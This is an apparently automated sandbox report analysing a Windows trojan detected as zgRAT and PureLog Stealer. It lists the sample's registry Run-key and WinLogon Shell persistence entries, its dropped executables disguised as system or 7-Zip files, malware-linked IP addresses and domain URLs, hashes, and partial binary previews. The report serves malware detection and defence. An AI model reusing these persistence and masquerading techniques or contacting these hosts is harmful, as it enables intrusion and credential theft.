                                                Analysis ID:1496460
                                                Start date and time:2024-08-21 10:01:55 +02:00
                                                Joe Sandbox product:CloudBasic
                                                Overall analysis duration:0h 9m 47s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                Number of analysed new started processes analysed:43
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:0
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Sample name:jW5TA1J9Z1.exe
                                                renamed because original name is a hash value
                                                Original Sample Name:910284D590BDF27BBEEDBDE3F3A2A94D.exe
                                                Detection:MAL
                                                Classification:mal100.spre.troj.spyw.expl.evad.winEXE@32/503@2/1
                                                EGA Information:
                                                • Successful, ratio: 7.1%
                                                HCA Information:Failed
                                                Cookbook Comments:
                                                • Found application associated with file extension: .exe

                                                Warnings

                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, svchost.exe, UsoClient.exe
                                                • Excluded domains from analysis (whitelisted): fs.microsoft.com, login.live.com, slscr.update.microsoft.com, settings-win.data.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                • Execution Graph export aborted for target MQYzEFytUKABjmoxvNTPTwUrcL.exe, PID 4904 because it is empty
                                                • Execution Graph export aborted for target MQYzEFytUKABjmoxvNTPTwUrcL.exe, PID 5368 because it is empty
                                                • Execution Graph export aborted for target MQYzEFytUKABjmoxvNTPTwUrcL.exe, PID 7916 because it is empty
                                                • Execution Graph export aborted for target RuntimeBroker.exe, PID 3824 because it is empty
                                                • Execution Graph export aborted for target RuntimeBroker.exe, PID 4580 because it is empty
                                                • Execution Graph export aborted for target RuntimeBroker.exe, PID 7964 because it is empty
                                                • Execution Graph export aborted for target dwm.exe, PID 180 because it is empty
                                                • Execution Graph export aborted for target dwm.exe, PID 1860 because it is empty
                                                • Execution Graph export aborted for target dwm.exe, PID 2436 because it is empty
                                                • Execution Graph export aborted for target jW5TA1J9Z1.exe, PID 5664 because it is empty
                                                • Execution Graph export aborted for target jW5TA1J9Z1.exe, PID 7032 because it is empty
                                                • Execution Graph export aborted for target jW5TA1J9Z1.exe, PID 7600 because it is empty
                                                • Execution Graph export aborted for target jW5TA1J9Z1.exe, PID 7840 because it is empty
                                                • Not all processes where analyzed, report is missing behavior information
                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                • Report size getting too big, too many NtCreateFile calls found.
                                                • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                • Report size getting too big, too many NtOpenFile calls found.
                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                • Report size getting too big, too many NtReadFile calls found.
                                                • Report size getting too big, too many NtSetInformationFile calls found.
                                                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                • VT rate limit hit for: jW5TA1J9Z1.exe

                                                Simulations

                                                Behavior and APIs

                                                TimeTypeDescription
                                                04:03:02API Interceptor434231x Sleep call for process: jW5TA1J9Z1.exe modified
                                                10:02:52AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run RuntimeBroker "C:\Windows\DiagTrack\RuntimeBroker.exe"
                                                10:03:00AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run dwm "C:\Program Files (x86)\internet explorer\SIGNUP\dwm.exe"
                                                11:57:49AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run MQYzEFytUKABjmoxvNTPTwUrcL "C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exe"
                                                11:58:02AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run jW5TA1J9Z1 "C:\Users\user\Desktop\jW5TA1J9Z1.exe"
                                                11:58:11AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run RuntimeBroker "C:\Windows\DiagTrack\RuntimeBroker.exe"
                                                11:58:19AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run dwm "C:\Program Files (x86)\internet explorer\SIGNUP\dwm.exe"
                                                11:58:27AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run MQYzEFytUKABjmoxvNTPTwUrcL "C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exe"
                                                11:58:36AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run jW5TA1J9Z1 "C:\Users\user\Desktop\jW5TA1J9Z1.exe"
                                                11:58:44AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run RuntimeBroker "C:\Windows\DiagTrack\RuntimeBroker.exe"
                                                11:58:52AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run dwm "C:\Program Files (x86)\internet explorer\SIGNUP\dwm.exe"
                                                11:59:00AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run MQYzEFytUKABjmoxvNTPTwUrcL "C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exe"
                                                11:59:08AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run jW5TA1J9Z1 "C:\Users\user\Desktop\jW5TA1J9Z1.exe"
                                                11:59:24AutostartRun: WinLogon Shell "C:\Windows\AppReadiness\RuntimeBroker.exe"
                                                11:59:32AutostartRun: WinLogon Shell "C:\Program Files (x86)\internet explorer\SIGNUP\dwm.exe"
                                                11:59:41AutostartRun: WinLogon Shell "C:\Windows\ServiceProfiles\MQYzEFytUKABjmoxvNTPTwUrcL.exe"
                                                11:59:49AutostartRun: WinLogon Shell "C:\Windows\DiagTrack\RuntimeBroker.exe"

                                                Joe Sandbox View / Context

                                                IPs

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                80.211.144.156NFnZNaiEGC.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                • 097430cm.n9sh.top/ImagephppacketLongpolllinuxUniversalDle.php
                                                PCf6uF6Pp0.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                • shizofrenia.top/externalPythonmultiProtect.php

                                                Domains

                                                No context

                                                ASNs

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                ARUBA-ASNITAtlas Copco- WEPCO.exeGet hashmaliciousFormBookBrowse
                                                • 62.149.128.40
                                                NFnZNaiEGC.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                • 80.211.144.156
                                                ExeFile (201).exeGet hashmaliciousEmotetBrowse
                                                • 80.211.32.88
                                                PCf6uF6Pp0.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                • 80.211.144.156
                                                file No83293 PO & Specification.gz.exeGet hashmaliciousFormBookBrowse
                                                • 62.149.128.40
                                                botx.arm6.elfGet hashmaliciousMiraiBrowse
                                                • 212.237.61.67
                                                64MXEd79F1.exeGet hashmaliciousFormBookBrowse
                                                • 62.149.128.40
                                                Nuova immagine bitmap (2).jsGet hashmaliciousUnknownBrowse
                                                • 80.88.84.21
                                                mtTw7o41OC.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                • 62.149.128.45
                                                https://www.unosicilia.it/verif/loginGet hashmaliciousUnknownBrowse
                                                • 89.46.108.69

                                                JA3 Fingerprints

                                                No context

                                                Dropped Files

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                C:\Users\user\Desktop\DVfmUYdt.logK61NUunFJv.exeGet hashmaliciousDCRatBrowse
                                                  NFnZNaiEGC.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                    PCf6uF6Pp0.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                      4fmxsamrPG.exeGet hashmaliciousDCRatBrowse
                                                        4QXC0LSV8t.exeGet hashmaliciousDCRatBrowse
                                                          webWin.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                            W1nner client.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                              htxERaJl1W.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                Injector.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                  WWAHost.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse

                                                                    Created / dropped Files

                                                                    C:\Program Files (x86)\Internet Explorer\SIGNUP\6cb0b6c459d5d3

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:ASCII text, with very long lines (407), with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):407
                                                                    Entropy (8bit):5.82168149031522
                                                                    Encrypted:false
                                                                    SSDEEP:6:KKuHTJVsV2TbONOmv35i9V4sWm12v5HWhjjVYjIY0JicoKZtrtKJjEFGai81n:KKuHH0uYfItWpv5HWh/Vz9Gaio
                                                                    MD5:BD4097EB8EAA695A449023A44E7644A6
                                                                    SHA1:C704874C9C38F5AAA3FFC4817E9D11C145173CBF
                                                                    SHA-256:D206E87680237D25BD8330A553D621BF8945DB022CEC4DB5EDA0657FC9B7331C
                                                                    SHA-512:34ADB62830FB8470D9FAFD5081B3D75BF1BBF14EFC6D024336E4E061574A22B984E9A9CC3100C876973705DF8238964C24075355ACD639E465D2E2C6DE2F5D00
                                                                    Malicious:false
                                                                    Preview:cPnmeGHZCydsSp85xD7YQJyqwCVfYP2Y3Tmggy1HFzsUGB6FMucNMjISa60cumBx5Ey9DbY8L0SabekuFQTowoMTKTFk8YWdy4YBM6BuVeCVRs16VFWeSWAR1fytVy9weymgGjiIPiTSm1BcbJO3B2Kb3HJqHSYgeP0cFVzwhOPuDsoAdWRMjGvmnKm9Z1A7JwxXAjWGUcVxmaYLcJMvAM6XeOy5s0WpNSkR4R949L2Hu79NwbgQpP67zZ3wubYdFqkUzHQLJSvyUzngOlIRUGA7VnbeYNKiwYBEWoXpKUGWdHm9wWhISHJ8qm9Mpvx5INC5xjKjOdG9AneNBbsCqBPpPDYupLAZhKOQFqMNL74zBK8CIwLNDvPG7WquKZ4CdqbzYOHUPf0sGaoFEVl3AwW

                                                                    C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exe

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):1960448
                                                                    Entropy (8bit):7.550221219335871
                                                                    Encrypted:false
                                                                    SSDEEP:24576:cxr3a1dihASqBZKAcKEYq3nMMKUpgEVcUVaOrlfDPfZwaSiShgqdQ4oB1r/jjpvi:yadiFk/EOUkOZfLfpShg01sxXpkSvKm
                                                                    MD5:910284D590BDF27BBEEDBDE3F3A2A94D
                                                                    SHA1:6561EF1E4B2521AAF86F03AB791AC5ED6C4AF7D0
                                                                    SHA-256:6A397C6E1041AD55295C3FE2CF7F795DA853004C1A02E1D77C65F0DA86AD312E
                                                                    SHA-512:AA66C2DCA084FC179756D360F91609A433B2E704CC0E19AE05F25749C8C102EDF2808A92C088782643EF3EC75FA91768333820E30C3839247EC815D9BF8A8797
                                                                    Malicious:true
                                                                    Yara Hits:
                                                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exe, Author: Joe Security
                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exe, Author: Joe Security
                                                                    Antivirus:
                                                                    • Antivirus: Avira, Detection: 100%
                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                    • Antivirus: ReversingLabs, Detection: 74%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....s.f................................. ... ....@.. .......................`............@.....................................K.... .. ....................@....................................................... ............... ..H............text...4.... ...................... ..`.rsrc... .... ......................@....reloc.......@......................@..B........................H.......p.......................T........................................0..........(.... ........8........E....9...............84...*(.... ....8....(.... ....~....{....:....& ....8....(.... ....~....{l...:....& ....8........0.......... ........8........E....-...............9...8(...~....:)... ........8.......... ....8....r...ps....z*~....(O... .... .... ....s....~....(S....... ....~....{h...:n...& ....8c.......~....(W...~....([... ....?.... ....~....{....:-...& ....8".....(.

                                                                    C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exe:Zone.Identifier

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):26
                                                                    Entropy (8bit):3.95006375643621
                                                                    Encrypted:false
                                                                    SSDEEP:3:ggPYV:rPYV
                                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                    Malicious:true
                                                                    Preview:[ZoneTransfer]....ZoneId=0

                                                                    C:\Program Files (x86)\Microsoft\Edge\Application\CSC3376F6C86CE44268A97E49BC81EF4C9D.TMP

                                                                    Download File
                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                    File Type:MSVC .res
                                                                    Category:dropped
                                                                    Size (bytes):1168
                                                                    Entropy (8bit):4.448520842480604
                                                                    Encrypted:false
                                                                    SSDEEP:24:mZxT0uZhNB+h9PNnqNdt4+lEbNFjMyi07:yuulB+hnqTSfbNtme
                                                                    MD5:B5189FB271BE514BEC128E0D0809C04E
                                                                    SHA1:5DD625D27ED30FCA234EC097AD66F6C13A7EDCBE
                                                                    SHA-256:E1984BA1E3FF8B071F7A320A6F1F18E1D5F4F337D31DC30D5BDFB021DF39060F
                                                                    SHA-512:F0FCB8F97279579BEB59F58EA89527EE0D86A64C9DE28300F14460BEC6C32DDA72F0E6466573B6654A1E992421D6FE81AE7CCE50F27059F54CF9FDCA6953602E
                                                                    Malicious:false
                                                                    Preview:.... ...........................D...<...............0...........D.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...8.....I.n.t.e.r.n.a.l.N.a.m.e...m.s.e.d.g.e...e.x.e.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...@.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...m.s.e.d.g.e...e.x.e.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <security>.. <requestedPrivileges xmlns="urn:schemas-micro

                                                                    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

                                                                    Download File
                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):4608
                                                                    Entropy (8bit):3.898711169208433
                                                                    Encrypted:false
                                                                    SSDEEP:48:6Im1t9xZ8RxeOAkFJOcV4MKe28dJsVlvqBH/uulB+hnqXSfbNtm:e6xvxVx9psVlvkRTkZzNt
                                                                    MD5:A88AF3796A749AD28DB691EDE7B3212C
                                                                    SHA1:6FC2DC40F3F75840106020FFBFFEDEDF59FC1283
                                                                    SHA-256:F2694FB125365B59694C8023F06B0D36DAF24FBD50601F8A6827A8817AF84E65
                                                                    SHA-512:96D4E780C37E74DD8BFA8CCADC0C049D0699E9C96582F325F8BEAE6B9129C8B65A1BE0568F5E84B86B8F21BC3239ED93E8D62566F2BB2E5980F7EFF9DC779EA6
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f.............................'... ...@....@.. ....................................@.................................L'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......(!..$.............................................................(....*.0..!.......r...pr...p.{....(....(....&..&..*....................0..........r...p(....&..&..*....................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(....*..(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings............#US.........#GUID....... ...#Blob...........WU........%3................................................................

                                                                    C:\Program Files\7-Zip\Lang\3b1a2dfabaeac3

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:ASCII text, with very long lines (649), with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):649
                                                                    Entropy (8bit):5.874951939748383
                                                                    Encrypted:false
                                                                    SSDEEP:12:RVB5qjCKJ4a2Uc8GoTLIsndSA+qm93UWVNx6+j3wZS7QoJTBhypdLnX7MQ:TqjUa2Uc8GoT0snAAtmWI6zSU+TT4jt
                                                                    MD5:38E28EA64062356A490CE0ACAE86C2C8
                                                                    SHA1:6FCED6B5CFA3E04C80CBB954BC5593FEF170D76E
                                                                    SHA-256:8BA43CD6C3573F18DA5117546930B56A7A02D8C916FB4EE08E7719133CA240A1
                                                                    SHA-512:3D536EB9D458CAEEB9CEF8BBE5F6A3ADD239CBAB3ACD5E69412C2B34E5A1158BC5D75245FF0B02C38BCCDF0AB10B6ACEBDA1F910D6C95033DB5A736958A339BA
                                                                    Malicious:false
                                                                    Preview:NjSrZbnvBJnz9pnqWhfS81OGC2pKjugfhrAVqgaZDX6sax941By0eypWUMpgwcMRnHRSoS90HFPk4gqO3vTi5pAtBoAe13mkLoESgrPiC7tZjEbyfamBJoV7GiQASe9NdoZPcXsMfug86lJ6NL9aQlagTGL7aPQh8f54pLWHsafZIXBeYTwGfi61N36VLuvQd8AapPRBz1s0GBY5FrjHcJCZjEqvOA67oO5JXkyJBvRn0GvLeAQeLoyT5k1lifwz5vL1GOie2aFq2YjdTeROtbwAalOwsNkf9bsF43FQbwmviHahAYRDOiFd8KbfAvvozkrbqeiaZAw7zBbSKqwU5gQbVOGubjPqA758a90f01nNvIo7tIVT9bsSTQFbYx80vG61Fd2KzQdE2DpNkIBTO6qjOmpJ4ZHC3xcpMx2PQKdt7oZPl21PwomyaWmcxtQaIbKFk9AwQvDDd6mkMZiBi1POKoPzLZcg4CkfeUpl1E9BljVduCQYLO2RL546uKl1SgIaWGF2u6Kd1OnlTwFIIEVqKTUiZt1qcIsFa4Ho6YoOEYZ7STm7FcsOKcPCwhcAEdBtfiLYpaMuaGlw4XQGG4k9ae47pE2Z5nKlWpbuHOSpQ7yD0cHYQW4K2BSBnNtkixzw6AZO5

                                                                    C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exe

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):1960448
                                                                    Entropy (8bit):7.550221219335871
                                                                    Encrypted:false
                                                                    SSDEEP:24576:cxr3a1dihASqBZKAcKEYq3nMMKUpgEVcUVaOrlfDPfZwaSiShgqdQ4oB1r/jjpvi:yadiFk/EOUkOZfLfpShg01sxXpkSvKm
                                                                    MD5:910284D590BDF27BBEEDBDE3F3A2A94D
                                                                    SHA1:6561EF1E4B2521AAF86F03AB791AC5ED6C4AF7D0
                                                                    SHA-256:6A397C6E1041AD55295C3FE2CF7F795DA853004C1A02E1D77C65F0DA86AD312E
                                                                    SHA-512:AA66C2DCA084FC179756D360F91609A433B2E704CC0E19AE05F25749C8C102EDF2808A92C088782643EF3EC75FA91768333820E30C3839247EC815D9BF8A8797
                                                                    Malicious:true
                                                                    Yara Hits:
                                                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exe, Author: Joe Security
                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exe, Author: Joe Security
                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exe, Author: Joe Security
                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exe, Author: Joe Security
                                                                    Antivirus:
                                                                    • Antivirus: Avira, Detection: 100%
                                                                    • Antivirus: Avira, Detection: 100%
                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                    • Antivirus: ReversingLabs, Detection: 74%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....s.f................................. ... ....@.. .......................`............@.....................................K.... .. ....................@....................................................... ............... ..H............text...4.... ...................... ..`.rsrc... .... ......................@....reloc.......@......................@..B........................H.......p.......................T........................................0..........(.... ........8........E....9...............84...*(.... ....8....(.... ....~....{....:....& ....8....(.... ....~....{l...:....& ....8........0.......... ........8........E....-...............9...8(...~....:)... ........8.......... ....8....r...ps....z*~....(O... .... .... ....s....~....(S....... ....~....{h...:n...& ....8c.......~....(W...~....([... ....?.... ....~....{....:-...& ....8".....(.

                                                                    C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exe:Zone.Identifier

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):26
                                                                    Entropy (8bit):3.95006375643621
                                                                    Encrypted:false
                                                                    SSDEEP:3:ggPYV:rPYV
                                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                    Malicious:true
                                                                    Preview:[ZoneTransfer]....ZoneId=0

                                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\MQYzEFytUKABjmoxvNTPTwUrcL.exe.log

                                                                    Download File
                                                                    Process:C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exe
                                                                    File Type:CSV text
                                                                    Category:dropped
                                                                    Size (bytes):847
                                                                    Entropy (8bit):5.354334472896228
                                                                    Encrypted:false
                                                                    SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                                    MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                                    SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                                    SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                                    SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                                    Malicious:false
                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..

                                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\RuntimeBroker.exe.log

                                                                    Download File
                                                                    Process:C:\Windows\DiagTrack\RuntimeBroker.exe
                                                                    File Type:CSV text
                                                                    Category:dropped
                                                                    Size (bytes):847
                                                                    Entropy (8bit):5.354334472896228
                                                                    Encrypted:false
                                                                    SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                                    MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                                    SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                                    SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                                    SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                                    Malicious:false
                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..

                                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\dwm.exe.log

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exe
                                                                    File Type:CSV text
                                                                    Category:dropped
                                                                    Size (bytes):847
                                                                    Entropy (8bit):5.354334472896228
                                                                    Encrypted:false
                                                                    SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                                    MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                                    SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                                    SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                                    SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                                    Malicious:false
